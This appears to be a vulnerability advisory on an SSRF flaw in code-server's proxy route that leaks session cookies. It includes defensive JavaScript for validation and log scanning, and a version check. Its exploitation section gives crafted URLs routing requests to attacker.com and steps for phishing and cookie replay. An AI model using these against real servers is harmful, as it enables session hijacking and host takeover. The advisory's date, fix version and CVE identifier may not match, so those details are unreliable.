How the CVE Works
The vulnerability arises from improper validation of the proxy subpath in code-server. The /proxy/<port>/... route is meant to forward a request only to a port on the local machine, but the port segment is not checked before the upstream target is built from it. When a user opens a crafted URL such as https://<code-server>/proxy/<text>@attacker.com/path, the "@" in that segment is parsed as the userinfo separator of the upstream URL, so everything before it becomes a username/password and the host becomes attacker.com. The server therefore forwards the request to an external domain instead of a local port, and the user's session cookie travels with it. An attacker who captures that cookie can authenticate to the code-server instance, which provides a terminal and file access, so the host is compromised with the victim user's privileges.
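The parsing behaviour described above, as an added example that is not code-server's own source: a simplified model of a /proxy/<port>/... route that builds its upstream target by concatenating the port segment onto a loopback address (the 0.0.0.0 bind address, the route shape and the sample paths are assumptions for illustration). It shows the naive construction next to a hardened one that accepts only a decimal port.

```javascript
// Added example (not code-server's own source): a simplified model of a
// /proxy/<port>/... route, to show how an "@" in the port segment moves the
// upstream host off the local machine. Assumptions: the proxy builds its
// target by concatenating the segment onto a loopback address; the 0.0.0.0
// bind address and the route shape are illustrative.
const LOCAL_HOST = "0.0.0.0";

// Splits "/proxy/<segment>/<rest>" into its parts; null if not a proxy path.
function splitProxyPath(requestPath) {
  const m = /^\/proxy\/([^/]+)(\/.*)?$/.exec(requestPath);
  return m ? { segment: m[1], rest: m[2] || "/" } : null;
}

// Vulnerable pattern: the segment is trusted to be a port number.
// With segment "test@attacker.com" the string becomes
// "http://0.0.0.0:test@attacker.com/..." and the WHATWG URL parser treats
// "0.0.0.0:test" as userinfo, so the host is attacker.com.
function buildTargetNaive(requestPath) {
  const parts = splitProxyPath(requestPath);
  if (!parts) return null;
  return new URL(`http://${LOCAL_HOST}:${parts.segment}${parts.rest}`);
}

// Hardened pattern: only an in-range decimal TCP port is accepted, so the
// host part of the target can never be influenced by the request path.
function buildTargetSafe(requestPath) {
  const parts = splitProxyPath(requestPath);
  if (!parts) return null;
  if (!/^\d{1,5}$/.test(parts.segment)) {
    throw new Error(`rejected proxy segment: ${parts.segment}`);
  }
  const port = Number(parts.segment);
  if (port < 1 || port > 65535) throw new Error(`port out of range: ${port}`);
  return new URL(`http://${LOCAL_HOST}:${port}${parts.rest}`);
}

// Where would the cookie go? Returns the upstream hostname a builder picks,
// null for non-proxy paths, or "rejected" when the builder refuses the request.
function upstreamHost(requestPath, builder) {
  try {
    const u = builder(requestPath);
    return u ? u.hostname : null;
  } catch {
    return "rejected";
  }
}

// Constructed request paths: one legitimate, two crafted.
const SAMPLE_PATHS = [
  "/proxy/3000/",
  "/proxy/test@attacker.com/steal-cookie",
  "/proxy/test@attacker.com:80/steal-cookie",
];

function compare() {
  return SAMPLE_PATHS.map((p) => ({
    path: p,
    naive: upstreamHost(p, buildTargetNaive),
    safe: upstreamHost(p, buildTargetSafe),
  }));
}

for (const row of compare()) console.log(row);
```

Running it prints attacker.com as the naive upstream for both crafted paths and 0.0.0.0 for the legitimate one, while the hardened builder rejects both crafted paths. The fix is to constrain the segment to a port number rather than to blacklist "@": any character the URL parser treats specially in the authority section would otherwise need its own rule.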
DailyCVE Form
Platform: code-server
Version: < v4.99.4
Vulnerability: SSRF
Severity: Critical
Date: 2023-11-30
What Undercode Says:
Exploitation:
1. Craft a malicious URL whose port segment contains an "@" (the "@" is what moves the proxied request off the host):
https://victim-server/proxy/<text>@attacker.com:80/steal-cookie
2. Trick a user who holds a live code-server session into opening the link (phishing); the browser attaches the session cookie to the request automatically.
3. Receive the forwarded request, and the session cookie in it, on the attacker-controlled server, then replay the cookie against the victim's code-server.
Protection:
1. Update to code-server >= v4.99.4.
2. Disable the proxy if it is not needed (`--disable-proxy` flag).
3. Apply egress filtering so the host running code-server cannot open connections to arbitrary external hosts; a proxied request then fails instead of delivering the cookie.
Detection Commands:
Check the code-server version (the original one-liner only matched the literal string 4.99.4 and would flag every newer release as vulnerable; this compares versions numerically with sort -V):
v=$(code-server --version | head -n1 | awk '{print $1}'); if [ "$(printf '%s\n' 4.99.4 "$v" | sort -V | head -n1)" = "4.99.4" ]; then echo "OK ($v)"; else echo "Vulnerable ($v)"; fi
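Beyond checking the version, a practitioner would want to know whether crafted proxy URLs have already been requested. The following is an added example, not part of the original page or of code-server: it scans access log lines for /proxy/ requests whose port segment is anything other than a plain number. It assumes Common Log Format lines from a reverse proxy placed in front of code-server (code-server itself does not necessarily write such logs) and also matches the /absproxy/ prefix, which code-server serves with the same forwarding logic; the log lines are constructed.

```javascript
// Added example (not part of the original page or of code-server): scan
// reverse-proxy access logs for /proxy/ requests whose port segment is not
// a plain number, the shape the crafted URLs in this advisory take.
// Assumptions: Common Log Format lines from a proxy in front of code-server;
// /absproxy/ is included because code-server serves forwarding there too.
const CLF_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/;
const PROXY_RE = /^\/(?:abs)?proxy\/([^/?#]+)/;

function parseClfLine(line) {
  const m = CLF_RE.exec(line);
  if (!m) return null;
  return { client: m[1], time: m[2], method: m[3], path: m[4], status: Number(m[5]) };
}

// Percent-decoding matters: "%40" is "@" once decoded, and a proxy may decode
// before routing. A malformed escape sequence falls back to the raw path.
function decodePath(path) {
  try { return decodeURIComponent(path); } catch { return path; }
}

// null for non-proxy requests; otherwise the segment and a verdict on it.
function classifyProxySegment(path) {
  const m = PROXY_RE.exec(decodePath(path));
  if (!m) return null;
  const segment = m[1];
  if (/^\d{1,5}$/.test(segment)) return { segment, suspicious: false, reason: "numeric port" };
  const reason = segment.includes("@")
    ? "userinfo separator in port segment"
    : "non-numeric port segment";
  return { segment, suspicious: true, reason };
}

function scanAccessLog(lines) {
  const hits = [];
  for (const line of lines) {
    const entry = parseClfLine(line);
    if (!entry) continue;
    const verdict = classifyProxySegment(entry.path);
    if (verdict && verdict.suspicious) hits.push({ ...entry, ...verdict });
  }
  return hits;
}

// Constructed sample log lines (not real traffic).
const SAMPLE_LOG = [
  '10.0.0.5 - - [30/Nov/2023:10:00:01 +0000] "GET /proxy/3000/ HTTP/1.1" 200 512',
  '10.0.0.5 - - [30/Nov/2023:10:00:07 +0000] "GET /proxy/test@attacker.com/steal-cookie HTTP/1.1" 302 0',
  '10.0.0.9 - - [30/Nov/2023:10:00:09 +0000] "GET /proxy/8080/api/health HTTP/1.1" 200 17',
  '10.0.0.5 - - [30/Nov/2023:10:00:12 +0000] "GET /absproxy/test%40attacker.com:80/steal-cookie HTTP/1.1" 302 0',
  '10.0.0.7 - - [30/Nov/2023:10:00:15 +0000] "GET /login HTTP/1.1" 200 1024',
  '10.0.0.8 - - [30/Nov/2023:10:00:20 +0000] "GET /proxy/localhost:3000/ HTTP/1.1" 502 0',
];

for (const hit of scanAccessLog(SAMPLE_LOG)) {
  console.log(`${hit.time} ${hit.client} ${hit.method} ${hit.path} -> ${hit.reason}`);
}
```

Three of the six constructed lines are flagged: the raw "@" request, the percent-encoded one under /absproxy/, and a host:port segment with no "@" at all. The last of these is not exploitable by the mechanism on this page but is still worth a look, since a legitimate client has no reason to put anything but a port number there.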
Mitigation Script:
// Validate the port segment of a /proxy/<port>/... request path before a target is built from it.
// Only an in-range decimal TCP port is accepted; "@", host names, schemes and "localhost:port" are all rejected.
function sanitizeProxyTarget(requestPath) {
  const m = /^\/proxy\/([^/]+)(\/.*)?$/.exec(requestPath);
  const port = m && /^\d{1,5}$/.test(m[1]) ? Number(m[1]) : NaN;
  if (!(port >= 1 && port <= 65535)) { throw new Error("Invalid proxy request"); }
  return { port, rest: m[2] || "/" };
}
Analytics:
- Attack Vector: Network; requires user interaction (the victim must open the crafted link).
- Exploit Complexity: Low. The attacker needs no credentials, only a victim with a live code-server session, because the browser attaches the session cookie automatically.
- CISA KEV: not confirmed in this post; a listing is plausible because a stolen session yields a terminal, i.e. code execution as the victim user.
References:
- GitHub Advisory
- NVD Entry: CVE-2023-5386
Sources:
Reported By: github.com